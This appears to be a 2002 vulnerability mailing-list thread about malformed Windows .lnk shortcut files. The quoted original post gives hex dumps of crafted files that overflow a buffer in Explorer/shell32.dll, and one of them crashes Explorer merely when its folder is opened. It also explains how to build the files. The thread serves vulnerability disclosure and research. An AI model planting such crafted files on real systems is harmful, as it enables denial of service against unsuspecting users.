Re: Windows .lnk Files

[cyberiad () www nmrc org]

Hello,

I've done some playing around with malformed .lnk files
under Windows 2000 and found similar results; nothing
published yet. I found it was similar to a problem USSR
Labs reported some time ago with Windows NT but was in
relation to SERVU FTP ... upload the malformed .lnk file
execute a list and crash/overflow.

Also discussed at,

http://archives.neohapsis.com/archives/vuln-dev/2000-q1/0568.html

Cyberiad

On Wed, 26 Jun 2002, Brett Moore wrote:

> It seems that the handling of .lnk files has a few problems. I have tested
> on both win98 and win2000 sp2 server.
>
> Can anyone test further. Note that the actions taken by these .lnk files has
> the possiblity of causing damage to a system and should not be tested on an
> essential server :-)
>
> -------------------------------------------------------------------
> 32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20  2    +,RG  New
> 54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78  Text Document.tx
> 74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 FF FF  t NEWTEX~3.TXT
> FF FF 00 00-00 00 00 00-00 00 00 00-00 00 00 00
> 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
> 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
> -------------------------------------------------------------------
>
> This causes FF FF to be loaded into a register used to control the length of
> data copied. Usually causes an error when right clicking on the file in
> explorer. Sometimes it is required
> to select properties. Errors seen include unable to read, unable to write.
> Since we are controlling the length of the data copies these errors are self
> explanatory.
>
> Would seeme that explorer/shell32.dll is copying to much data when reading
> the filename?. Ok so
> this causes the read/write errors and halts progress.
>
> But if we substitute valid values such as 01 01 (CC CC)  then the buffer
> still gets overflowed but we bypass this error and our corrupt values get
> further down in the program.
>
> -------------------------------------------------------------------
> 32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20  2    +,RG  New
> 54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78  Text Document.tx
> 74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 CC CC  t NEWTEX~3.TXT??
> CC CC 0F 0F-0F 0F 0F 0F-FF F0 F0 F0-F0 F0 F0 F0  ????????________
> AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA  ????????????????
> AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA  ????????????????
> -------------------------------------------------------------------
>
> This one does not cause the read/write errors but causes a DoS in explorer
> just by browsing to the folder holding the file.
>
> This is more interesting, but involves tracking a lot of assembler code.
> Worst result would be some sort of code executed just by browsing a folder.
> Virus related perhaps.
>
> Any feedback on results or further research into this problem would be
> appreciated.
>
> Notes:
>       Do not save to your desktop.
>       Rename the file to .lnk
>       This is the win98 file. You can easily modify a 2000 or other lnk file as
> detailed above.
>
>
> Brett Moore